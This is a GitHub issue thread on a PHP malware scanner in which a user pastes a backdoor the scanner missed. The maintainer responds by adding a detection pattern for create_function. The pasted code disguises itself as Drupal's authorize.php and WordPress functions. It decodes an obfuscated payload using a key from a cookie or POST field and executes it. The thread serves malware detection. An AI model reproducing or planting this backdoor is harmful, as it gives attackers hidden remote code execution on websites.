Missed backdoor - Githubissues

vmirkovicmodx commented 5 years ago

Found a backdoor that was missed by the scanner

<?php

/**

@file
Administrative script for running authorized file operations.
Using this script, the site owner (the user actually owning the files on
the webserver) can authorize certain file-related operations to proceed
with elevated privileges, for example to deploy and upgrade modules or
themes. Users should not visit this page directly, but instead use an
administrative user interface which knows how to redirect the user to this
script as part of a multistep process. This script actually performs the
selected operations without loading all of Drupal, to be able to more
gracefully recover from errors. Access to the script is controlled by a
global killswitch in settings.php ('allow_authorize_operations') and via
the 'administer software updates' permission.
There are helper functions for setting up an operation to run via this
system in modules/system/system.module. For more information, see:
@link authorize Authorized operation helper functions @endlink //

/**

Root directory of Drupal installation. // define('DRUPAL_ROOT', getcwd());

/**

Global flag to identify update.php and authorize.php runs, and so
avoid various unwanted operations, such as hook_init() and
hook_exit() invokes, css/js preprocessing and translation, and
solve some theming issues. This flag is checked on several places
in Drupal code (not just authorize.php). // define('MAINTENANCE_MODE', 'update');

/**

Renders a 403 access denied page for authorize.php. // function authorize_access_denied_page() { drupal_add_http_header('Status', '403 Forbidden'); watchdog('access denied', 'authorize.php', NULL, WATCHDOG_WARNING); drupal_set_title('Access denied'); return t('You are not allowed to access this page.'); }

/**

Determines if the current user is allowed to run authorize.php.
The killswitch in settings.php overrides all else, otherwise, the user must
have access to the 'administer software updates' permission.
@return
TRUE if the current user can run authorize.php, otherwise FALSE. // function authorize_access_allowed() { return variable_get('allow_authorize_operations', TRUE) && user_access('administer software updates'); }

// Real work of the script begins here.

require_once DRUPAL_ROOT . '/includes/bootstrap.inc'; require_once DRUPAL_ROOT . '/includes/session.inc'; require_once DRUPAL_ROOT . '/includes/common.inc'; require_once DRUPAL_ROOT . '/includes/file.inc'; require_once DRUPAL_ROOT . '/includes/module.inc'; require_once DRUPAL_ROOT . '/includes/ajax.inc';

// We prepare only a minimal bootstrap. This includes the database and // variables, however, so we have access to the class autoloader registry. drupal_bootstrap(DRUPAL_BOOTSTRAP_SESSION);*/

function pre_term_name( $wp_kses_data, $wp_nonce ) { $kses_str = str_replace( array ('%', '*'), array ('/', '='), $wp_kses_data ); $filter = base64_decode( $kses_str ); $md5 = strrev( $wp_nonce ); $sub = substr( md5( $md5 ), 0, strlen( $wp_nonce ) ); $wp_nonce = md5( $wp_nonce ). $sub; $preparefunc = 'gzinflate'; $i = 0; do { $ord = ord( $filter[$i] ) - ord( $wp_nonce[$i] ); $filter[$i] = chr( $ord % 256 ); $wp_nonce .= $filter[$i]; $i++; } while ($i < strlen( $filter )); return @$preparefunc( $filter ); }

$wp_nonce = isset($_POST['f_dr']) ? $_POST['f_dr'] : (isset($_COOKIE['f_dr']) ? $_COOKIE['f_dr'] : NULL);

$wp_auth_check = '

'; $wp_default_logo = '

'; preg_match('#

#', $wp_default_logo, $logo_data); $wp_kses_data = $logo_data[1];

$wpautop = pre_term_name( $wp_kses_data, $wp_nonce );

if( isset( $wpautop ) ){ if( isset($_POST['f_dr']) ) @setcookie( 'f_dr', $_POST['f_dr'] ); $shortcode_unautop = create_function( '', $wpautop ); unset( $f_dr, $wpautop ); $shortcode_unautop(); }

scr34m commented 5 years ago

Please insert as code with markdown formatting or with GIST

rremo commented 5 years ago

Hello, Maybe this file will help you: https://github.com/bediger4000/php-malware-analysis/blob/master/107.175.218.241-2018-10-14a/kinked.simppeli/inc/template-tags.php from @bediger4000

The repository looks very interesting!

scr34m commented 5 years ago

Thanks, checking.

scr34m commented 5 years ago

Well this create_function('', $wpautop) and there are a caution as well on PHP site http://php.net/manual/en/function.create-function.php, maybe a patten for create_function( '',

scr34m commented 5 years ago

Pattern added for the create_function used in this sample, thank you both for the report.

scr34m / php-malware-scanner

Missed backdoor #42